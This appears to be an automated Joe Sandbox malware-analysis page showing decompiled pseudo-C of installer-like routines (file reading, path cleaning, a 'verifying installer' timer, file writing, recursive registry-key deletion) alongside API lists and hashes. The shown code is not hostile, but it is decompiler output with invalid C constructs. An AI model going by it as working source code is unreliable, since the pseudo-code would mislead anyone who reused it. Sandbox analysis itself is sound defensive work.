SetBkColor.GDI32(?,?), ref: 00404560
DeleteObject.GDI32(?), ref: 0040457A
CreateBrushIndirect.GDI32(?), ref: 00404584

Memory Dump Source

Source File: 00000000.00000002.384256540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.384150816.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384266178.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384277316.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384287375.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384296720.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384309962.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384319671.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384329384.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384334519.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384339903.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ypdTgfE0o8.jbxd

Similarity

API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
String ID:
API String ID: 2320649405-0
Opcode ID: f4fe220c79686689299554ac50abea47664d32920eac269e7a43003585d3568b
Instruction ID: 38e33b6b7dbb33234eb72a45dbf2bae34717d2ad5d3f2d744b20a042554d00e7
Opcode Fuzzy Hash: f4fe220c79686689299554ac50abea47664d32920eac269e7a43003585d3568b
Instruction Fuzzy Hash: 072133B1500704BBCB319F68DD08B5BBBF8AF45714F04896EEB96A26E1D734E904CB58

Uniqueness

Uniqueness Score: -1.00%

Function 004026EC Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 153
fileCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E004026EC(intOrPtr __ebx, intOrPtr __edx, void* __edi) {
				intOrPtr _t65;
				intOrPtr _t66;
				intOrPtr _t72;
				void* _t76;
				void* _t79;

				_t72 = __edx;
				 *((intOrPtr*)(_t76 - 8)) = __ebx;
				_t65 = 2;
				 *((intOrPtr*)(_t76 - 0x4c)) = _t65;
				_t66 = E00402D84(_t65);
				_t79 = _t66 - 1;
				 *((intOrPtr*)(_t76 - 0x10)) = _t72;
				 *((intOrPtr*)(_t76 - 0x44)) = _t66;
				if(_t79 < 0) {
					L36:
					 *0x42a2a8 =  *0x42a2a8 +  *(_t76 - 4);
				} else {
					__ecx = 0x3ff;
					if(__eax > 0x3ff) {
						 *(__ebp - 0x44) = 0x3ff;
					}
					if( *__edi == __bx) {
						L34:
						__ecx =  *(__ebp - 0xc);
						__eax =  *(__ebp - 8);
						 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __bx;
						if(_t79 == 0) {
							 *(_t76 - 4) = 1;
						}
						goto L36;
					} else {
						 *(__ebp - 0x38) = __ebx;
						 *(__ebp - 0x18) = E00406467(__ecx, __edi);
						if( *(__ebp - 0x44) > __ebx) {
							do {
								if( *((intOrPtr*)(__ebp - 0x34)) != 0x39) {
									if( *((intOrPtr*)(__ebp - 0x24)) != __ebx ||  *(__ebp - 8) != __ebx || E004060D8( *(__ebp - 0x18), __ebx) >= 0) {
										__eax = __ebp - 0x50;
										if(E0040607A( *(__ebp - 0x18), __ebp - 0x50, 2) == 0) {
											goto L34;
										} else {
											goto L21;
										}
									} else {
										goto L34;
									}
								} else {
									__eax = __ebp - 0x40;
									_push(__ebx);
									_push(__ebp - 0x40);
									__eax = 2;
									__ebp - 0x40 -  *((intOrPtr*)(__ebp - 0x24)) = __ebp + 0xa;
									__eax = ReadFile( *(__ebp - 0x18), __ebp + 0xa, __ebp - 0x40 -  *((intOrPtr*)(__ebp - 0x24)), ??, ??);
									if(__eax == 0) {
										goto L34;
									} else {
										__ecx =  *(__ebp - 0x40);
										if(__ecx == __ebx) {
											goto L34;
										} else {
											__ax =  *(__ebp + 0xa) & 0x000000ff;
											 *(__ebp - 0x4c) = __ecx;
											 *(__ebp - 0x50) = __eax;
											if( *((intOrPtr*)(__ebp - 0x24)) != __ebx) {
												L28:
												__ax & 0x0000ffff = E0040644E( *(__ebp - 0xc), __ax & 0x0000ffff);
											} else {
												__ebp - 0x50 = __ebp + 0xa;
												if(MultiByteToWideChar(__ebx, 8, __ebp + 0xa, __ecx, __ebp - 0x50, 1) != 0) {
													L21:
													__eax =  *(__ebp - 0x50);
												} else {
													__edi =  *(__ebp - 0x4c);
													__edi =  ~( *(__ebp - 0x4c));
													while(1) {
														_t22 = __ebp - 0x40;
														 *_t22 =  *(__ebp - 0x40) - 1;
														__eax = 0xfffd;
														 *(__ebp - 0x50) = 0xfffd;
														if( *_t22 == 0) {
															goto L22;
														}
														 *(__ebp - 0x4c) =  *(__ebp - 0x4c) - 1;
														__edi = __edi + 1;
														SetFilePointer( *(__ebp - 0x18), __edi, __ebx, 1) = __ebp - 0x50;
														__eax = __ebp + 0xa;
														if(MultiByteToWideChar(__ebx, 8, __ebp + 0xa,  *(__ebp - 0x40), __ebp - 0x50, 1) == 0) {
															continue;
														} else {
															goto L21;
														}
														goto L22;
													}
												}
												L22:
												if( *((intOrPtr*)(__ebp - 0x24)) != __ebx) {
													goto L28;
												} else {
													if( *(__ebp - 0x38) == 0xd ||  *(__ebp - 0x38) == 0xa) {
														if( *(__ebp - 0x38) == __ax || __ax != 0xd && __ax != 0xa) {
															 *(__ebp - 0x4c) =  ~( *(__ebp - 0x4c));
															__eax = SetFilePointer( *(__ebp - 0x18),  ~( *(__ebp - 0x4c)), __ebx, 1);
														} else {
															__ecx =  *(__ebp - 0xc);
															__edx =  *(__ebp - 8);
															 *(__ebp - 8) =  *(__ebp - 8) + 1;
															 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __ax;
														}
														goto L34;
													} else {
														__ecx =  *(__ebp - 0xc);
														__edx =  *(__ebp - 8);
														 *(__ebp - 8) =  *(__ebp - 8) + 1;
														 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __ax;
														 *(__ebp - 0x38) = __eax;
														if(__ax == __bx) {
															goto L34;
														} else {
															goto L26;
														}
													}
												}
											}
										}
									}
								}
								goto L37;
								L26:
								__eax =  *(__ebp - 8);
							} while ( *(__ebp - 8) <  *(__ebp - 0x44));
						}
						goto L34;
					}
				}
				L37:
				return 0;
			}

0x004026ec
0x004026ee
0x004026f1
0x004026f3
0x004026f6
0x004026fb
0x004026ff
0x00402702
0x00402705
0x00402c2a
0x00402c2d
0x0040270b
0x0040270b
0x00402712
0x00402714
0x00402714
0x0040271a
0x0040287e
0x0040287e
0x00402881
0x00402886
0x004015b6
0x0040292e
0x0040292e
0x00000000
0x00402720
0x00402721
0x0040272c
0x0040272f
0x0040273b
0x0040273f
0x004027d7
0x004027ef
0x004027ff
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00402745
0x00402745
0x00402748
0x00402749
0x0040274c
0x00402751
0x00402758
0x00402760
0x00000000
0x00402766
0x00402766
0x0040276b
0x00000000
0x00402771
0x00402771
0x00402779
0x0040277c
0x0040277f
0x0040283a
0x00402841
0x00402785
0x0040278b
0x00402797
0x00402801
0x00402801
0x00402799
0x00402799
0x0040279c
0x0040279e
0x0040279e
0x0040279e
0x004027a1
0x004027a6
0x004027a9
0x00000000
0x00000000
0x004027ab
0x004027ae
0x004027bc
0x004027c2
0x004027d0
0x00000000
0x004027d2
0x00000000
0x004027d2
0x00000000
0x004027d0
0x0040279e
0x00402804
0x00402807
0x00000000
0x00402809
0x0040280e
0x0040284f
0x00402871
0x00402878
0x0040285d
0x0040285d
0x00402860
0x00402863
0x00402866
0x00402866
0x00000000
0x00402817
0x00402817
0x0040281a
0x0040281d
0x00402823
0x00402827
0x0040282a
0x00000000
0x00000000
0x00000000
0x00000000
0x0040282a
0x0040280e
0x00402807
0x0040277f
0x0040276b
0x00402760
0x00000000
0x0040282c
0x0040282c
0x0040282f
0x00402838
0x00000000
0x0040272f
0x0040271a
0x00402c33
0x00402c39

APIs

ReadFile.KERNEL32(?,?,?,?), ref: 00402758
MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402793
SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004027B6
MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004027CC

Part of subcall function 004060D8: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 004060EE

SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 00402878

Strings

9, xrefs: 0040273B

Memory Dump Source

Source File: 00000000.00000002.384256540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.384150816.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384266178.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384277316.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384287375.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384296720.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384309962.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384319671.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384329384.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384334519.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384339903.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ypdTgfE0o8.jbxd

Similarity

API ID: File$Pointer$ByteCharMultiWide$Read
String ID: 9
API String ID: 163830602-2366072709
Opcode ID: 236766759de96d2d3aaf4f5caab781f4252851e9d444e3fd407b0b900c44e253
Instruction ID: 3c27e7501abded1006c2f30e54a373b5f9dac3b1129e645fb880415469f2e5e7
Opcode Fuzzy Hash: 236766759de96d2d3aaf4f5caab781f4252851e9d444e3fd407b0b900c44e253
Instruction Fuzzy Hash: 2351FA75D00219AADF20DF95CA89AAEBB79FF04304F10817BE541B62D0D7B49D82CB59

Uniqueness

Uniqueness Score: -1.00%

Function 0040678E Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 69
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E0040678E(WCHAR* _a4) {
				short _t5;
				short _t7;
				WCHAR* _t19;
				WCHAR* _t20;
				WCHAR* _t21;

				_t20 = _a4;
				if( *_t20 == 0x5c && _t20[1] == 0x5c && _t20[2] == 0x3f && _t20[3] == 0x5c) {
					_t20 =  &(_t20[4]);
				}
				if( *_t20 != 0 && E00405E4D(_t20) != 0) {
					_t20 =  &(_t20[2]);
				}
				_t5 =  *_t20;
				_t21 = _t20;
				_t19 = _t20;
				if(_t5 != 0) {
					do {
						if(_t5 > 0x1f &&  *((short*)(E00405E03(L"*?|<>/\":", _t5))) == 0) {
							E00405FB2(_t19, _t20, CharNextW(_t20) - _t20 >> 1);
							_t19 = CharNextW(_t19);
						}
						_t20 = CharNextW(_t20);
						_t5 =  *_t20;
					} while (_t5 != 0);
				}
				 *_t19 =  *_t19 & 0x00000000;
				while(1) {
					_push(_t19);
					_push(_t21);
					_t19 = CharPrevW();
					_t7 =  *_t19;
					if(_t7 != 0x20 && _t7 != 0x5c) {
						break;
					}
					 *_t19 =  *_t19 & 0x00000000;
					if(_t21 < _t19) {
						continue;
					}
					break;
				}
				return _t7;
			}

0x00406790
0x00406799
0x004067b0
0x004067b0
0x004067b7
0x004067c3
0x004067c3
0x004067c6
0x004067c9
0x004067ce
0x004067d0
0x004067d9
0x004067dd
0x004067fa
0x00406802
0x00406802
0x00406807
0x00406809
0x0040680c
0x00406811
0x00406812
0x00406816
0x00406816
0x00406817
0x0040681e
0x00406820
0x00406827
0x00000000
0x00000000
0x0040682f
0x00406835
0x00000000
0x00000000
0x00000000
0x00406835
0x0040683a

APIs

CharNextW.USER32(?,*?|<>/":,00000000,00000000,76F1FAA0,C:\Users\user\AppData\Local\Temp\,?,004034D2,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037DA), ref: 004067F1
CharNextW.USER32(?,?,?,00000000,?,004034D2,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037DA), ref: 00406800
CharNextW.USER32(?,00000000,76F1FAA0,C:\Users\user\AppData\Local\Temp\,?,004034D2,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037DA), ref: 00406805
CharPrevW.USER32(?,?,76F1FAA0,C:\Users\user\AppData\Local\Temp\,?,004034D2,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037DA), ref: 00406818

Strings

*?|<>/":, xrefs: 004067E0
C:\Users\user\AppData\Local\Temp\, xrefs: 0040678F

Memory Dump Source

Source File: 00000000.00000002.384256540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.384150816.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384266178.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384277316.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384287375.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384296720.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384309962.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384319671.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384329384.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384334519.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384339903.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ypdTgfE0o8.jbxd

Similarity

API ID: Char$Next$Prev
String ID: *?|<>/":$C:\Users\user\AppData\Local\Temp\
API String ID: 589700163-826357637
Opcode ID: 7f8a10c6574f84f045d99a2f2ba91d71661da1c9dbe2055a6f375f6d39957bd5
Instruction ID: 0f69a0116b7f1ba106e871a719c63b07a343e19011b313dcb24ddb0bfcf4baff
Opcode Fuzzy Hash: 7f8a10c6574f84f045d99a2f2ba91d71661da1c9dbe2055a6f375f6d39957bd5
Instruction Fuzzy Hash: CE11862A80161299D7303B149D40A7762FCEF98764F56843FE986732C0E77C4CD286BD

Uniqueness

Uniqueness Score: -1.00%

Function 00404E1E Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404E1E(struct HWND__* _a4, intOrPtr _a8) {
				long _v8;
				signed char _v12;
				unsigned int _v16;
				void* _v20;
				intOrPtr _v24;
				long _v56;
				void* _v60;
				long _t15;
				unsigned int _t19;
				signed int _t25;
				struct HWND__* _t28;

				_t28 = _a4;
				_t15 = SendMessageW(_t28, 0x110a, 9, 0);
				if(_a8 == 0) {
					L4:
					_v56 = _t15;
					_v60 = 4;
					SendMessageW(_t28, 0x113e, 0,  &_v60);
					return _v24;
				}
				_t19 = GetMessagePos();
				_v16 = _t19 >> 0x10;
				_v20 = _t19;
				ScreenToClient(_t28,  &_v20);
				_t25 = SendMessageW(_t28, 0x1111, 0,  &_v20);
				if((_v12 & 0x00000066) != 0) {
					_t15 = _v8;
					goto L4;
				}
				return _t25 | 0xffffffff;
			}

0x00404e2c
0x00404e39
0x00404e3f
0x00404e7d
0x00404e7d
0x00404e8c
0x00404e93
0x00000000
0x00404e95
0x00404e41
0x00404e50
0x00404e58
0x00404e5b
0x00404e6d
0x00404e73
0x00404e7a
0x00000000
0x00404e7a
0x00000000

APIs

SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404E39
GetMessagePos.USER32 ref: 00404E41
ScreenToClient.USER32 ref: 00404E5B
SendMessageW.USER32(?,00001111,00000000,?), ref: 00404E6D
SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404E93

Strings

f, xrefs: 00404E6F

Memory Dump Source

Source File: 00000000.00000002.384256540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.384150816.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384266178.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384277316.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384287375.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384296720.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384309962.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384319671.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384329384.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384334519.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384339903.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ypdTgfE0o8.jbxd

Similarity

API ID: Message$Send$ClientScreen
String ID: f
API String ID: 41195575-1993550816
Opcode ID: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
Instruction ID: 39da0b83e90955b658913b401ee9b713f1841a36fe6a8bad0240d4c742fa7cb5
Opcode Fuzzy Hash: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
Instruction Fuzzy Hash: E9018C72A0021DBADB00DBA4CD81FFEBBB8AF55710F10002BBA51B61C0C7B49A018BA4

Uniqueness

Uniqueness Score: -1.00%

Function 00402F93 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40
timeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00402F93(struct HWND__* _a4, intOrPtr _a8) {
				short _v132;
				int _t11;
				int _t20;

				if(_a8 == 0x110) {
					SetTimer(_a4, 1, 0xfa, 0);
					_a8 = 0x113;
				}
				if(_a8 == 0x113) {
					_t20 =  *0x414eb8; // 0x9000
					_t11 =  *0x420ec4;
					if(_t20 >= _t11) {
						_t20 = _t11;
					}
					wsprintfW( &_v132, L"verifying installer: %d%%", MulDiv(_t20, 0x64, _t11));
					SetWindowTextW(_a4,  &_v132);
					SetDlgItemTextW(_a4, 0x406,  &_v132);
				}
				return 0;
			}

0x00402fa3
0x00402fb1
0x00402fb7
0x00402fb7
0x00402fc5
0x00402fc7
0x00402fcd
0x00402fd4
0x00402fd6
0x00402fd6
0x00402fec
0x00402ffc
0x0040300e
0x0040300e
0x00403016

APIs

SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402FB1
MulDiv.KERNEL32(00009000,00000064,?), ref: 00402FDC
wsprintfW.USER32 ref: 00402FEC
SetWindowTextW.USER32(?,?), ref: 00402FFC
SetDlgItemTextW.USER32 ref: 0040300E

Strings

verifying installer: %d%%, xrefs: 00402FE6

Memory Dump Source

Source File: 00000000.00000002.384256540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.384150816.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384266178.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384277316.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384287375.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384296720.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384309962.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384319671.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384329384.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384334519.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384339903.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ypdTgfE0o8.jbxd

Similarity

API ID: Text$ItemTimerWindowwsprintf
String ID: verifying installer: %d%%
API String ID: 1451636040-82062127
Opcode ID: b8c438f2cb2d4d4e81e5e052a7d6c8fe5fe1304565937caf9c710faa28001cd8
Instruction ID: 6e758109fa8cded6d2ea51641b68a6ee4e1df044416b280c1a6c4c5bd582b841
Opcode Fuzzy Hash: b8c438f2cb2d4d4e81e5e052a7d6c8fe5fe1304565937caf9c710faa28001cd8
Instruction Fuzzy Hash: B1014F7164020DABEF609F60DE4ABEA3B69FB00345F008039FA06B51D1DBB999559F58

Uniqueness

Uniqueness Score: -1.00%

Function 00402950 Relevance: 9.1, APIs: 6, Instructions: 91
memoryfileCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E00402950(int __ebx) {
				WCHAR* _t26;
				void* _t29;
				long _t37;
				int _t49;
				void* _t52;
				void* _t54;
				void* _t56;
				void* _t59;
				void* _t60;
				void* _t61;

				_t49 = __ebx;
				_t52 = 0xfffffd66;
				_t26 = E00402DA6(0xfffffff0);
				_t55 = _t26;
				 *(_t61 - 0x40) = _t26;
				if(E00405E4D(_t26) == 0) {
					E00402DA6(0xffffffed);
				}
				E00405FD2(_t55);
				_t29 = E00405FF7(_t55, 0x40000000, 2);
				 *(_t61 + 8) = _t29;
				if(_t29 != 0xffffffff) {
					 *(_t61 - 0x38) =  *(_t61 - 0x2c);
					if( *(_t61 - 0x28) != _t49) {
						_t37 =  *0x42a234;
						 *(_t61 - 0x44) = _t37;
						_t54 = GlobalAlloc(0x40, _t37);
						if(_t54 != _t49) {
							E004034AF(_t49);
							E00403499(_t54,  *(_t61 - 0x44));
							_t59 = GlobalAlloc(0x40,  *(_t61 - 0x28));
							 *(_t61 - 0x10) = _t59;
							if(_t59 != _t49) {
								E004032B4( *(_t61 - 0x2c), _t49, _t59,  *(_t61 - 0x28));
								while( *_t59 != _t49) {
									_t60 = _t59 + 8;
									 *(_t61 - 0x3c) =  *_t59;
									E00405FB2( *((intOrPtr*)(_t59 + 4)) + _t54, _t60,  *_t59);
									_t59 = _t60 +  *(_t61 - 0x3c);
								}
								GlobalFree( *(_t61 - 0x10));
							}
							E004060A9( *(_t61 + 8), _t54,  *(_t61 - 0x44));
							GlobalFree(_t54);
							 *(_t61 - 0x38) =  *(_t61 - 0x38) | 0xffffffff;
						}
					}
					_t52 = E004032B4( *(_t61 - 0x38),  *(_t61 + 8), _t49, _t49);
					CloseHandle( *(_t61 + 8));
				}
				_t56 = 0xfffffff3;
				if(_t52 < _t49) {
					_t56 = 0xffffffef;
					DeleteFileW( *(_t61 - 0x40));
					 *((intOrPtr*)(_t61 - 4)) = 1;
				}
				_push(_t56);
				E00401423();
				 *0x42a2a8 =  *0x42a2a8 +  *((intOrPtr*)(_t61 - 4));
				return 0;
			}

0x00402950
0x00402952
0x00402957
0x0040295c
0x0040295f
0x00402969
0x0040296d
0x0040296d
0x00402973
0x00402980
0x00402988
0x0040298b
0x00402997
0x0040299a
0x004029a0
0x004029ae
0x004029b3
0x004029b7
0x004029ba
0x004029c3
0x004029cf
0x004029d3
0x004029d6
0x004029e0
0x004029ff
0x004029ec
0x004029f4
0x004029f7
0x004029fc
0x004029fc
0x00402a06
0x00402a06
0x00402a13
0x00402a19
0x00402a1f
0x00402a1f
0x004029b7
0x00402a33
0x00402a35
0x00402a35
0x00402a3f
0x00402a40
0x00402a44
0x00402a48
0x00402a4e
0x00402a4e
0x00402a55
0x004022f1
0x00402c2d
0x00402c39

APIs

GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 004029B1
GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004029CD
GlobalFree.KERNEL32 ref: 00402A06
GlobalFree.KERNEL32 ref: 00402A19
CloseHandle.KERNEL32(?,?,?,?,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A35
DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A48

Memory Dump Source

Source File: 00000000.00000002.384256540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.384150816.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384266178.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384277316.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384287375.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384296720.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384309962.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384319671.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384329384.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384334519.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384339903.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ypdTgfE0o8.jbxd

Similarity

API ID: Global$AllocFree$CloseDeleteFileHandle
String ID:
API String ID: 2667972263-0
Opcode ID: 434c5aa2fa4661cc93f8b90accf7d486b4cf32dd195f8743aa915133d4078579
Instruction ID: f067c9a989b14af8d706ebefa04c24d1529afff37e35bb6a261b9bb9a52bb1c4
Opcode Fuzzy Hash: 434c5aa2fa4661cc93f8b90accf7d486b4cf32dd195f8743aa915133d4078579
Instruction Fuzzy Hash: 71318F71D01114BBCF216FA5CE49D9EBE79EF09364F14023AF550762E0CB794D429B98

Uniqueness

Uniqueness Score: -1.00%

Function 00402EA9 Relevance: 7.6, APIs: 5, Instructions: 84
registryCOMMON

Download Yara Rule

C-Code - Quality: 48%

			E00402EA9(void* __eflags, void* _a4, short* _a8, signed int _a12) {
				void* _v8;
				int _v12;
				short _v536;
				void* _t27;
				signed int _t33;
				intOrPtr* _t35;
				signed int _t45;
				signed int _t46;
				signed int _t47;

				_t46 = _a12;
				_t47 = _t46 & 0x00000300;
				_t45 = _t46 & 0x00000001;
				_t27 = E00406374(__eflags, _a4, _a8, _t47 | 0x00000009,  &_v8);
				if(_t27 == 0) {
					if((_a12 & 0x00000002) == 0) {
						L3:
						_push(0x105);
						_push( &_v536);
						_push(0);
						while(RegEnumKeyW(_v8, ??, ??, ??) == 0) {
							__eflags = _t45;
							if(__eflags != 0) {
								L10:
								RegCloseKey(_v8);
								return 0x3eb;
							}
							_t33 = E00402EA9(__eflags, _v8,  &_v536, _a12);
							__eflags = _t33;
							if(_t33 != 0) {
								break;
							}
							_push(0x105);
							_push( &_v536);
							_push(_t45);
						}
						RegCloseKey(_v8);
						_t35 = E004068D4(3);
						if(_t35 != 0) {
							return  *_t35(_a4, _a8, _t47, 0);
						}
						return RegDeleteKeyW(_a4, _a8);
					}
					_v12 = 0;
					if(RegEnumValueW(_v8, 0,  &_v536,  &_v12, 0, 0, 0, 0) != 0x103) {
						goto L10;
					}
					goto L3;
				}
				return _t27;
			}

0x00402eb4
0x00402ebd
0x00402ec6
0x00402ed2
0x00402edb
0x00402ee5
0x00402f0a
0x00402f10
0x00402f15
0x00402f16
0x00402f46
0x00402f1f
0x00402f21
0x00402f71
0x00402f74
0x00000000
0x00402f7a
0x00402f30
0x00402f35
0x00402f37
0x00000000
0x00000000
0x00402f3f
0x00402f44
0x00402f45
0x00402f45
0x00402f52
0x00402f5a
0x00402f61
0x00000000
0x00402f8a
0x00000000
0x00402f69
0x00402ef5
0x00402f08
0x00000000
0x00000000
0x00000000
0x00402f08
0x00402f90

APIs

RegEnumValueW.ADVAPI32 ref: 00402EFD
RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402F49
RegCloseKey.ADVAPI32(?,?,?), ref: 00402F52
RegDeleteKeyW.ADVAPI32(?,?), ref: 00402F69
RegCloseKey.ADVAPI32(?,?,?), ref: 00402F74

Memory Dump Source

Source File: 00000000.00000002.384256540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.384150816.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384266178.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384277316.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384287375.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384296720.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
